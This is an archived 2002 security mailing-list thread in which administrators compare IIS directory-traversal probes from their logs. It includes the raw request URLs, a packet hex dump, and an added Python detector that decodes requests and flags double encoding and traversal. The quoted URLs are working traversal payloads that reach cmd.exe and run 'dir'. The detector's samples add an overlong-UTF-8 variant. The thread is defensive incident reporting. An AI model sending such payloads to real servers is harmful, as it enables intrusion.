RE: Unicode worm?

From: Larsen, Colin (colin.larsenat_private)
Date: Wed Aug 21 2002 - 21:26:50 PDT


    I get this every day. Usually in batches of 8 to 16 probes. Mostly from
    China, Korea (even 2 nights of a couple of hundred probes from an Asian IT
    university!) I figure it's a fact of life that anything attached to the big
    wide world is gonna get shot at.
    
    Colin.
    
    -----Original Message-----
    From: John Sage [mailto:jsageat_private]
    Sent: Thursday, 22 August 2002 4:01 p.m.
    To: incidentsat_private
    Subject: Re: Unicode worm?
    
    
    Soeren, Keith:
    
    On Wed, Aug 21, 2002 at 07:43:00PM +0200, Soeren Ziehe wrote:
    > In article <51F912F2A6CDD111810A00600811BA42024D8BE9@TEA05> [21 Aug 02]
    >    Turner, Keith (Contractor)  <TurnerL@tea-emh1.army.mil> wrote:
    > 
    > > [08-21-2002 - 00:56:11] Client at x.x.x.x: URL normalization was
    > > not complete after one pass. Request will be rejected.  Site
    > > Instance='1', Raw URL='/scripts/..%255c%255c../winnt/system32/cmd.e
    > > xe'
    > 
    > I'm seeing the same requests.
    
    I've recently seen several single-payload packet probes of the form:
    
    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
    
     08/11-02:27:44.357277 216.181.16.2:4723 -> 12.82.129.71:80
    TCP TTL:110 TOS:0x0 ID:26376 IpLen:20 DgmLen:99 DF
    ***AP*** Seq: 0x36AEB784  Ack: 0x71FD0774  Win: 0x2238  TcpLen: 20
    47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
    35 63 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79  5c%5c../winnt/sy
    73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F  stem32/cmd.exe?/
    63 2B 64 69 72 0D 0A 69 72 0D 0A                 c+dir..ir..
    
    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
    
    These have source IP's _not_ within my class B, or A; very quick,
    typically six to nine packets for the total transaction, and they're gone.
    
    
    - John
    -- 
    "You are in a little maze of twisty passages, all different."
    
    PGP key:     http://www.finchhaven.com/pages/gpg_pubkey.html
    Fingerprint: C493 9F26 05A9 6497 9800  4EF6 5FC8 F23D 35A4 F705
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
    
    
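As an added example (not part of the thread or any poster's code), a small Python checker that does what the IIS log line quoted above describes: it percent-decodes a request path repeatedly, counts how many passes change it, and flags `..` traversal once the path is normalized with `\` folded to `/`. The sample requests are constructed; the first two are the raw URLs quoted in the thread, and the `%c0%af` variant goes beyond what the thread shows (an overlong UTF-8 form of `/`, the "Unicode" flavour of the same probe).

```python
import re

# Constructed sample requests: the first two are the raw URLs quoted in the
# thread; the others are made up here for contrast (one overlong-UTF-8
# variant, one benign path, one double-encoded but non-traversing query).
SAMPLE_REQUESTS = [
    "/scripts/..%255c%255c../winnt/system32/cmd.exe",
    "/scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir",
    "/index.html",
    "/cgi-bin/search.pl?q=%2525",
]

MAX_PASSES = 4          # bound on nested encodings so a pathological input cannot loop
_PCT = re.compile(r"%([0-9A-Fa-f]{2})")

def _decode_once(s):
    """One pass of percent-decoding. Overlong 2-byte UTF-8 forms (lead byte
    0xC0/0xC1, e.g. %c0%af) are folded to the ASCII byte they encode."""
    data = _PCT.sub(lambda m: chr(int(m.group(1), 16)), s).encode("latin-1", "replace")
    out, i = bytearray(), 0
    while i < len(data):
        b = data[i]
        if b in (0xC0, 0xC1) and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(((b & 0x1F) << 6) | (data[i + 1] & 0x3F))
            i += 2
        else:
            out.append(b)
            i += 1
    return out.decode("latin-1")

def normalize(raw_url):
    """Decode until the string stops changing. Returns (decoded, passes) where
    passes counts decoding rounds that altered the URL; passes > 1 is the
    condition IIS reports as 'URL normalization was not complete after one pass'."""
    current, passes = raw_url, 0
    for _ in range(MAX_PASSES):
        nxt = _decode_once(current)
        if nxt == current:
            break
        current, passes = nxt, passes + 1
    return current.replace("\\", "/"), passes

def classify(raw_url):
    """Describe a request: how many decode passes it needed and whether the
    normalized path contains a '..' segment (the traversal in these probes)."""
    decoded, passes = normalize(raw_url)
    path = decoded.split("?", 1)[0]
    traversal = ".." in path.split("/")
    return {"raw": raw_url, "decoded": decoded, "passes": passes,
            "double_encoded": passes > 1, "traversal": traversal}

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(classify(req))
```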



    This archive was generated by hypermail 2b30 : Wed Aug 21 2002 - 21:28:54 PDT